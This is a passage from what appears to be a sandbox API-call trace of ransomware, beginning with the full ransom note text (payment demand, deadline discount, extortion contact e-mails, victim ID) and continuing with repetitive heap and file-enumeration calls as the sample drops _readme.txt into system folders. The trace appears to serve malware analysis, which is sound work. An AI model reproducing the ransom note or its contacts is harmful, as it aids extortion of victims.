hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.606] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.606] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.606] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.606] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.607] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.607] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.607] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.607] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.607] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.607] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.607] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.607] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.607] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.607] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.607] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.607] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.608] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.608] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.609] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.609] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.610] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.610] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.611] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.611] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.612] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.612] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.613] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.613] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.614] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.614] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.615] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 